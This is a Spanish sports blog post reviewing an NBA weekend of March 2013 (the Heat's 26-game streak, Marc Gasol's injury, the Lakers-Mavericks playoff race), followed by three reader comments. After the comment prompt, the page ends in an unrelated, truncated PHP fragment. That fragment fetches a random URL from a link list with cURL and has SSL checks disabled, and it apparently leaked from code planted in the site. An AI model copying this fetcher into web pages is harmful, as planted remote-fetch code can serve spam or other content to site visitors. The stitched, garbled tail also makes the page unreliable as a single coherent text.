Informe del fin de semana: que alguien detenga a ese hombre

25 de March de 2013 por MagicJohnson32

Algunas cosas han cambiado durante el fin de semana que dejamos en el retrovisor. No son las rachas de Heat y Nuggets, que siguen intactas  (26 y 15 victorias seguidas respectivamente), sino el aspecto de las clasificaciones y en especial la perspectiva de algunos equipos ante el tramo final de campaña que nos espera. Los Thunder estrechan el cerco sobre San Antonio para hacerse con la primera posición del Oeste, y los Grizzlies pierden a Marc Gasol por un tiempo indeterminado, cosa que les condena casi con seguridad a la quinta plaza. Un poco más abajo, los Mavericks ya han dado caza a los Jazz y se convierten en la principal amenaza de los Lakers para el último billete a los Playoffs. Unos pocos meridianos más al Este, los Knicks han recuperado la segunda posición y los Celtics han encadenado cuatro derrotas y se olvidan de la ventaja de campo en primera ronda.

Veamos detalladamente cómo hemos llegado hasta aquí.

VIERNES

lebron ssssTras lograr apenas unos días antes dos remontadas de 17 puntos en Boston y de 27 en Cleveland, los Heat recuperaron 11 puntos a los Pistons de manera casi rutinaria y se apuntaron así su 25ª victoria seguida (89-103). Los campeones no pudieron contener a Monroe, que apabulló a Bosh, pero una defensa mucho más agresiva en la segunda parte fue todo lo que necesitó LeBron James para rematar con victoria su excelente actuación.

Al margen de la nueva muesca en el cinturón de los Heat, la noche del viernes fue la de los retornos. Triunfal fue el de Tony Parker, que se perdió los últimos ocho partidos por una lesión en el tobillo y volvió para enfrentarse y derrotar a los Jazz en un partido que se decidió en la prórroga. Marvin Williams forzó el tiempo extra con un triple sobre la bocina, pero Parker asumió el control entonces y dio a Popovich la 900ª victoria de su carrera como head coach. Duncan, por su parte, superó a Shaquille O’Neal en la lista histórica de reboteadores. Palabras mayores.

Los otros grandes regresos fueron los protagonizados por Kobe Bryant y en especial Pau Gasol, seis semanas ausente por un problema en el pie. Los Lakers, sin embargo, desperdiciaron la ocasión de distanciarse de los Jazz y cayeron frente a los emergentes Wizards (103-100) en un encuentro que los angelinos parecían controlar en la primera mitad, cuando la conexión Kobe-Howard funcionó como nunca. Los triples de Ariza y la persistencia de John Wall explotaron la dejadez de los locales e hicieron posible una remontada de 18 puntos. Gasol pagó la inactividad con una actuación gris.

Las derrotas de Lakers y Jazz abrían la puerta a Blazers y Mavs que, tras ganar dos compromisos complicados, presentaban únicamente dos derrotas más que los angelinos. Los de Portland asaltaron Atlanta (104-93), de nuevo impulsados por el rendimiento de su quinteto inicial, el acierto en los triples y un excelente último cuarto. Y si hablábamos antes de retornos, también volvió Marion después de ocho partidos lesionado y sobre todo fue noticia el primer partido de Jason Terry en Dallas desde que dejó los Mavs con destino Boston. El público le recibió con una ovación pero los Celtics encajaron su quinta derrota en siete partidos. Wright y Nowitzki lideraron la victoria (94-104) que mantiene a los texanos en la lucha por los Playoffs.

La madrugada del viernes también vio un nuevo asalto entre los aspirantes a la segunda posición del Este. Knicks y Pacers saldaron sus partidos con victorias, aplastante en el caso de Indiana, mucho más trabajada para los neoyorquinos. Los Knicks, sin Chandler, Amaré ni Kurt Thomas, todos lesionados, han encontrado en Kenyon Martin (recordemos: sin equipo hasta hace unos días) un referente interior más que solvente. Rudy Gay se retiró lesionado pero Alan Anderson anotó 35 puntos que contrarrestaron los 37 de Melo. En cambio, nadie en los Raptors pudo con la eficacia de Martin, autor de 9/10 tiros de campo y 11 rebotes decisivos para la victoria (99-94) que sella el pasaporte de los Knicks para los Playoffs. Otra aportación sorprendente está siendo la de Tyler Hansbrough, sensacional de nuevo como titular en ausencia de David West. Psycho-T fue el mejor de los Pacers en la clara victoria sobre los Bucks (78-102), que se basó en un 11-28 en el tercer cuarto tras una primera mitad equilibrada. El esperpéntico 4 de 37 (9%) en tiros de campo que sumaron entre Jennings, Daniels y Redick arrastró el porcentaje del equipo hasta un 30%, demasiada losa ante uno de los mejores equipos de la conferencia.

Mayores palizas se registraron en Houston, donde los Cavs se vieron arrasados (78-116) y pudimos ver buenos minutos de Thomas Robinson, y en cancha de los Suns, donde se produjo una clara victoria de los Wolves (117-86) en un partido sentenciado antes del descanso. Phoenix se queda solo en la cola del Oeste a causa de la sorprendente victoria de los Hornets ante Memphis Grizzlies (83-90). Habrá que revisar el vídeo de este partido para confirmar si es cierto lo que insinúan las estadísticas: que la pareja Robin Lopez & Anthony Davis fue claramente superior a Zach & Marc. Demasiados partidos está cediendo últimamente Memphis si su objetivo es la tercera posición. La segunda pertenece a los Thunder, que dejaron atrás sus últimas dos derrotas ganando en Orlando (97-89). Ante la ausencia de Vucevic por segundo partido consecutivo y la lesión de Afflalo (que se perderá lo que resta de temporada) en la primera mitad, los Magic tiraron de garra y de la extraordinaria actuación de Harkless para plantar cara a los finalistas de 2012, y llegaron a ponerse por delante en el último cuarto. Los puntos de Durant y los tiros libres ganaron el partido para OKC.

TOP 10 del viernes

SÁBADO

Faltaban minutos para que se iniciase la jornada del sábado cuando saltaban las alarmas. Lo adelantábamos por twitter: Marc Gasol había sufrido una lesión abdominal y el parte oficial lo considera baja indefinidamente. Demasiados factores condicionan la gravedad de la lesión, así que es difícil saber incluso si Marc volverá antes del final de la regular season. En cualquier caso, pésimas noticias para los Grizzlies, que sin embargo sacaron adelante el compromiso ante los Celtics (106-110). Randolph fue suplente por llegar tarde y los Grizzlies controlaron el partido a partir del segundo cuarto con un Bayless desatado y dispusieron de 21 puntos de renta a 7 minutos para el final. Pero los Celtics, incluso sin Rondo ni Garnett, no entienden de rendiciones, y entre Terrence Williams, DJ White y Jordan Crawford armaron una remontada que se quedó a dos puntos del milagro pero no evitó la cuarta derrota seguida de Boston. El acierto local en los tiros libres aseguró la victoria de Memphis, que a duras penas sigue el ritmo de los Nuggets. No sólo se han situado terceros los de George Karl, sino que ya amenazan la segunda posición de los Thunder tras apuntarse su 15ª victoria seguida. Sin Ty Lawson ni Chandler, Denver supo sufrir ante los Kings, dignísimos en su visita a la Mile-High City. DeMarcus Cousins dominó (24 puntos, 15 rebotes, 3 asistencias, 5 tapones), pero a la buena labor del frontcourt local se sumó en el tramo decisivo la veteranía de Andre Miller, autor de cinco puntos en el último minuto de partido (95-101).

También aguantan entre los candidatos al tercer puesto del Oeste los Clippers. En un partido sin ventajas de más de ocho puntos para ninguno de los dos equipo, un recital de Chris Paul en el último cuarto hizo posible la victoria ante los Nets (95-101). El base anotó 17 de sus 29 puntos en los doce minutos finales y ganó una bonita batalla con Deron Williams.

wall ejectedIgualmente importante fue el triunfo de los Warriors (92-101) ante los Wizars, que no pudieron contar con Ariza después de su explosión triplista en el Staples y vieron cómo John Wall era descalificado en el tercer cuarto tras enzarzarse con Klay Thompson. Los de Oakland se llevaron un buen susto cuando Steph Curry, sensacional en la velada con 35 puntos y 8 asistencias, se torció el tobillo. No es grave y el base podría incluso jugar esta noche ante los Lakers.

En el Este, los Knicks ganaron de nuevo a los Raptors y alcanzaron a los Pacers, que cayeron en Chicago. NY despachó por segunda noche consecutiva a Toronto, esta vez en el Madison, en un partido sin historia (84-110) y en el que los canadienses notaron más las bajas que los neoyorquinos. Los Bulls por su parte pudieron (84-87) con unos Pacers demasiado dependientes en ataque de George y Hibbert. Las buenas defensas -las dos mejores del Este- dejaron los porcentajes en torno al 40% y al final valió la eficacia de Boozer, Deng y Mohammed.

El partido que abrió la madrugada supuso el final de la racha negativa de los Pistons a costa de -evidentemente- los Bobcats. Los de Detroit venían de perder sus últimos diez partidos y necesitaron un último cuarto pletórico de Villanueva para remontar y ganar al peor equipo de la liga. Charlie-V anotó en ese tiempo 15 de los 23 puntos de su equipo, todos ellos necesarios ante el esfuerzo de Kemba Walker, que anotó los siete últimos puntos de su equipo pero falló la canasta para ganar.

TOP 10 del sábado

DOMINGO

El partido entre primero y último de la NBA duró apenas un asalto, que fue lo que quiso LeBron James que durara. Los Bobcats lograron una ventaja de 11 puntos (19-8) y James, que hasta el momento no había anotado, metió 10 puntos seguidos en un parcial de 0-15 que sirvió para encarrilar la 26ª victoria consecutiva de los Heat, que iguala la segunda mejor racha en la historia del deporte profesional americano. LeBron orquestó la paliza (77-109) con 32 puntos (11/14 tiros de campo), 10 asistencias, 8 rebotes, 3 robos y 3 tapones. ¿Hemos dicho que no jugó Wade? Ni falta que hizo.

harden spursMientras en el Este existe un abismo entre Heat y el resto, las cosas en la cima del Oeste se han puesto interesantes tras los resultados de anoche. Los Spurs cayeron en Houston (95-96) por culpa de James Harden, autor de la canasta ganadora a 4 segundos para el final con una bonita suspensión desde el tiro libre. Tony Parker anotó los 12 últimos puntos de su equipo sin fallo, pero no lanzó en el último minuto, cuando erraron Duncan, Leonard y Ginóbili. No lo hizo Harden y los Rockets ganan así su tercer partido consecutivo, que los deja prácticamente empatados con los Warriors por la sexta plaza. La derrota de San Antonio la aprovecharon los Thunder, que tumbaron a los Blazers en la segunda mitad tras un primer tramo igualado. Los sospechosos habituales, Westbrook & Durant, lideraron la clara victoria (83-103), que acorta la distancia entre primero y segundo del Oeste a 1,5 partidos.

En Dallas asistimos a lo que parece un relevo: los Jazz perdieron ante los Mavs y los texanos se convierten en el principal aspirante a disputar la octava plaza a los Lakers. El marcador (108-113) no refleja la clara victoria local, fundamentada en un parcial de 0-15 entre el final del tercer y principio del último cuarto. Mavs y Jazz quedan empatados con un balance de 34-36, dos partidos por detrás de Lakers, pero la trayectoria de Dallas es al alza (7-3 en los últimos 10) mientras los de Salt Lake City caen a plomo.

No hubo cambios en la zona noble del Este, donde se produjeron las victorias de Nets (4ª), Hawks (5º) y Bulls (6º). En Phoenix, lo que parecía un paseo para los Nets, con una ventaja de hasta 16 puntos, acabó no decidiéndose hasta la bocina final, cuando los Suns fallaron la oportunidad de mandar el partido a la prórroga (102-100). El descomunal partido de Goran Dragic encontró respuesta por parte de Deron Williams y -sorpresa, sorpresa- de Kris Humphries, que apareció por primera vez en muchas semanas para ganarse parte de su suculento salario.

Dos partidos por detrás de Brooklyn sigue Atlanta Hawks después de imponerse en Milwaukee, donde los Bucks dejaron escapar otra oportunidad de mejorar sus perspectivas de cara a escalar posiciones y evitar a los Heat en primera ronda. A punto estuvo Monta Ellis de ganar el partido en ‘modo héroe’ cuando anotó tres triples seguidos que pusieron a los Bucks 5 arriba a 2:45 para el final. Sin embargo, a partir de ese momento Ellis perdió dos balones, falló los dos tiros que intentó y sus compañeros sólo fueron capaces de anotar dos tiros libres en un parcial de 12-2 que dio la victoria a los Hawks (104-99). Sanders & Ilyasova (34 puntos, 22 rebotes, 3 tapones) plantaron cara pero sucumbieron ante Horford & Smith (47 puntos, 16 rebotes, 10 asistencias). Con las mismas derrotas que Atlanta se mantiene Chicago Bulls, que en su visita a Minnesota no tuvieron excesivos problemas (104-97). La baja de Joakim Noah no impidió que los Bulls dominasen la pintura (sirva de muestra el +20 en el rebote) y Nate Robinson en uno de sus días buenos (22 puntos y 10 asistencias) resultó desequilibrante.

Cerramos este repaso con el intrascendente Sixers @ Kings, que tuvo como principal aliciente los abucheos del público a Spencer Hawes después de que el ex-King declarase que no le importaría mucho si la franquicia se traslada a Seattle. El partido en sí se jugó al ritmo de los locales, cosa que aprovecharon los visitantes para anotar como no acostumbran a hacerlo y ganar (117-103), cosa que tampoco logran con mucha frecuencia. Seis Sixers lograron 14 puntos o más, con los 21 puntos, 10 rebotes, 7 asistencias y 5 robos de Holiday a la cabeza.

TOP 10 del domingo

Comenta

3 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    ¡Qué bien imita Durant a LeBron en la canasta del aficionado en el nº 5 ! ¬¬

    Si no tropezaran de esa manera prácticamente todo el mundo daría como segura la clasificación de los Lakers para PO pero viendo la racha de Dallas hay cierto runrun en el entorno.De todas formas el calendario de los Mavs es complicado.Reciben a Clippers,Pacers,Bulls,visitan el Staples para jugar contra Lakers y siguen la gira en la canca de Denver.Los amarillos se van de gira y Golden State,Minny,Milwaukee y Sacramento son las paradas antes de volver a casa para el partido contra Dallas.

    He mirado el calendario de Portland y los pobres se las ven con equipos del oeste con alguna batalla en la clasificación su próximo partido contra Nets,que no es nada fácil.Pocas opciones pero van a ser jueces en la clasificación final.

    En condiciones normales estos 5 partidos deberían servir para que los Lakers aumentaran la distancia con el 9º y ya verse metidos en PO.

      Citar

  2. MagicJohnson32 dice:
    #2

    ¿Y qué son “circunstancias normales” para los Lakers? No sé si existe eso, jeje.

    Esta noche hay un Lakers @ Warriors que va a determinar si LAL luchará por ser sexto o se limitará a defender su octava plaza.

      Citar

  3. Ruxixón dice:
    #3

    Cierto,se me olvida que son los Lakers jejej.63-40 primera mitad…así no se puede,y luego hay que leer que les iría de lujo quedar 8 para vérselas con los Spurs.Popovich vs D’Antoni…

    John Wall 0-0

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>